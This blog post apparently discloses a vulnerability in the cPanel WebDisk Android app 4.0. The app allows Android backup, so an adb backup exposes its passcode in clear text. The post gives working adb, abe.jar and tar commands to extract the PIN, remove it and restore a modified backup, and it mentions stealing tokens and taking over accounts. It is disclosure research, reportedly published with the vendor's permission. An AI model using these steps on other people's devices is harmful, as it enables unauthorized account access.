Friday 29 June 2018

Backup Vulnerability Vulnerability Exploitation

cPanel WebDisk Android App 4.0 : Backup Vulnerability

Hello folks,

This vulnerability is regarding an Insecure Data Storage & Security Miss-Congiguration, which can be achieve using Android Backup Functionality.

We all know that many of the mobile application stored user credentials or any sensitive data into device itself as clear text format. which ideally not a good practice.

But many of us might know that to access that data we need root privileges or require some special conditions like debugging to be enable. So still if the mobile application is storing sensitive data in clear text its not an issues. Many Security Teams & Bug Bounty Programs Specially exclude this kind of vulnerability where Root/JailBroken conditions required to exploit a vulnerability.

But what happened, if this data is accessible to a Normal User! Yes No Root Privilege Required.

So start looking what was the conditions I found in cPanel WebDisk Android App 4.0 which leads to PassCode Security Bypass.

First below was my Test Environment 
App Name & Version = cPanel WebDisk Android Application Version 4.0 
Tested On = Android 5.0 (Non Rooted Device+Rooted)

cPanel WebDisk Android Application have functionality to create a Pin Code to prevent unauthorised access. It can be found in Application>Settings> Passcode Lock. (We can see in below snap shot)

After enabling it, cPanel WebDisk Android Application will ask you for PassCode every time you exit the application.

Vulnerability Details:

In android there is a property called "Backup" which allow application to be backup by any other application or by self. This property can be declared in AndroidManifest.xml ex. allowBackup="true".

So if the AndroidManifest.xml allowBackup="true" That means application cab be backup, The same condition is exists in cPanel WebDisk Android App. 

First I backup the application using  adb backup androidpackage -f outfile.ab
adb backup net.cpanel.webdisk -f disk.ab After executing this command your device will ask you for Back Data Option as below. So hit Back My Data

This has created file called "disk.ab". Now I converted to backup file into compressed tar file using command

java -jar abe.jar unpack disk.ab disk.tar - If you are using windows machine then run cmd.exe as Administrator.

This command created a tar file (disk.tar), Later on I extracted this tar file using below command

tar xvf disk.tar This process created a new folder called "apps" which contents all backup of "cPanel WebDisk Android App". 

Finally I moved to "/apps/net.cpanel.webdisk/sp" folder and found a file "net.cpanel.webdisk_preferences.xml" which contents the PassCode Value which was "1337".

Using this PassCode I was able to get the DashBoard of the application.

POC Video 

You can download this Version APK from here for reproducing the issue-

Little Interesting Points
If this scenario the PIN code was saved as clear text format, so you can enter it in the application. But what happened if the PIN code is stored in encryption format ! 

1) So in this condition you can remove the <whole block of pincode> , you can replace the code with any garbage value & If you able to reverse the application then just do a quick look on encryption technique being used & replace the pincodevalue with your own value from preference.xml file and then saved it. Finally you have an xml file without PIN Lock Code value right.Later on you can perform below 

2) tar -tf disk.tar > disk.list 
3) star -c -v -f disk_new.tar -no-dirslash list=disk.list
4) java -jar abe.jar pack disk_new.tar disk_new.ab 
5) adb restore disk_new.ab (This command will prompt on your device to restore the backup as respect to that application)

In all 5 steps, we have simply remove the PIN Code block from the xml and re-pack it as android backup file and finally we restore that backup into the device. Now if all works well you will get application dashboard/home screen access without prompting for any Pass Code.

Some times, Backup also expose the API access token & some interesting points as well of the user just in case if the application is protected by any Authentication Lock functionality. You can get the API Access token and make calls on behalf of the user.

One of the scenario I encounter with is, the application was doing some authentication from internal storage database for user authentication. So once we backup the application and looked into the DB file, we found some session management data. To verify my doubt we just changed the value of username with victimusername and restore the backup. 
Once the devices is restarted, we accessed the application and found our self into the victim account. 

As we can see we have tons of scenarios where we can exploit this functionality.

Permission is taken from cPanel Security Team for public disclosure.

Comments are always welcome. 

No comments:

Post a Comment